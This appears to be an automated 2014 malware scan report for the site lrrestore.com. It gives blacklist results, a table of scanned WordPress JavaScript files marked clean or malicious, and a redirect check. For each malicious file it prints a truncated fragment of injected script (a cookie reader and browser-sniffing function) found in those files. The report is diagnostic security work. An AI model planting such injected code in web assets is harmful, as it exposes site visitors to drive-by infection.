Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lrrestore.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lrrestore.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lrrestore.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 05:49:28 GMT Location: http://www.lrREstore.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.lrREstore.com/xmlrpc.php | clean |
http://www.lrrestore.com/ | 200 OK Content-Length: 72030 Content-Type: text/html | clean |
http://www.lrREstore.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 96004 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/uploads/shareaholic/spritegen/jquery.shareaholic-publishers-sb.min.js?ver=6.0.0.3 | 200 OK Content-Length: 50280 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - 7:"\u05e7\u05e6\u05e8 URL \u05e2\u05dd",8:"\u05d3\u05d7\u05e3 \u05d0\u05ea \u05d6\u05d4 \u05d1",9:"\u05e9\u05de\u05d5\u05e8 \u05db\u05de\u05d5\u05e2\u05d3\u05e3 \u05d1",10:"\u05e9\u05dc\u05d7 \u05d3\u05e8\u05da",11:""},nl:{0:"Publiceer op",1:"Voeg toe aan",2:"Stuur in op",3:"Deel op",4:"Print met",5:"Publiceer op",6:"Suggereer dit artikel op",7:"Verkort de URL met",8:"Push dit op",9:"Maak een bladwijzer op",10:"Verzend met",11:""}};SHR4P.ga.init();SHR4P.load(); Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/cufon-yui.js | 200 OK Content-Length: 19406 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/vera.font.js | 200 OK Content-Length: 34504 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/menu.js | 200 OK Content-Length: 1652 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - var zIndexNumber = 50; jQuery('ul').each(function() { jQuery(this).css('zIndex', zIndexNumber); zIndexNumber -= 10; });}); jQuery("#front_menu ul").css('opacity', 0.9); jQuery("#front_menu ul").css({display: "none"}); jQuery("#front_menu li").hover(function(){ jQuery(this).find('ul:first').css({visibility: "visible",display: "none"}).show(); },function(){ jQuery(this).find('ul:first').css({visibility: "hidden"}); }); }); Antivirus reports:
| ||
http://s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.lrREstore.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.4.1 | 200 OK Content-Length: 2073 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - return WPGroHo.renderers[key]( data[key], hash, id, key ); } jQuery( '#' + id ).find( 'h4' ).after( jQuery( '<p class="grav-extra ' + key + '" />' ).html( data[key] ) ); } } }, WPGroHo ); jQuery( document ).ready( function( $ ) { Gravatar.profile_cb = function( h, d ) { WPGroHo.syncProfileData( h, d ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wpadminbar' ); } ); Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://stats.wordpress.com/e-201438.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://lrrestore.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 05:49:39 GMT Pragma: no-cache Location: http://www.lrREstore.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 05:49:39 GMT X-Pingback: http://www.lrREstore.com/xmlrpc.php | clean |
http://www.lrrestore.com/test404page.js | 404 Not Found Content-Length: 13108 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lrrestore.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 05:49:28 GMT
Location: http://www.lrREstore.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.lrREstore.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: lrrestore.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 05:49:28 GMT
Location: http://www.lrREstore.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.lrREstore.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lrrestore.com
Referer: http://www.google.com/search?q=lrrestore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lrrestore.com
Referer: http://www.google.com/search?q=lrrestore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.